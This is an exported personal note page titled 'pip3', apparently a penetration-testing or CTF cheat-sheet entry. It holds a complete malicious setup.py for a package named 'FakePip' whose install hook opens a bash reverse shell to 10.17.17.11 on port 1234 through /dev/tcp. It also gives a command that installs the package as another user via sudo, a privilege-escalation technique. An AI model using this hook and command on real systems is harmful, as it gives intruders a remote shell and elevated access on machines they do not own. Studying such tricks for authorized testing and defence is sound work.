<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>pip3</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>pip3</h1>

      <div class="ck-content"><pre><code class="language-text-plain">from setuptools import setup
from setuptools.command.install import install
import base64 
import os
class CustomInstall(install):
        def run(self):
                install.run(self)
                os.system("bash -c 'bash -i &gt;&amp; /dev/tcp/10.17.17.11/1234 0&gt;&amp;1' ")

setup(name='FakePip',
        version='0.0.1',
        description='this is nice',
        author='123',
        author_email='and@gmail.com',
        license='MIT',
        zip_safe=False,
        cmdclass={'install': CustomInstall})</code></pre>

        <p>name file as setup.py, make an empty directory with only this file and
          run</p><pre><code class="language-text-plain">sudo -u &lt;user&gt; /usr/bin/pip3 install . --upgrade --force-reinstall</code></pre>
      </div>
    </div>
  </body>

</html>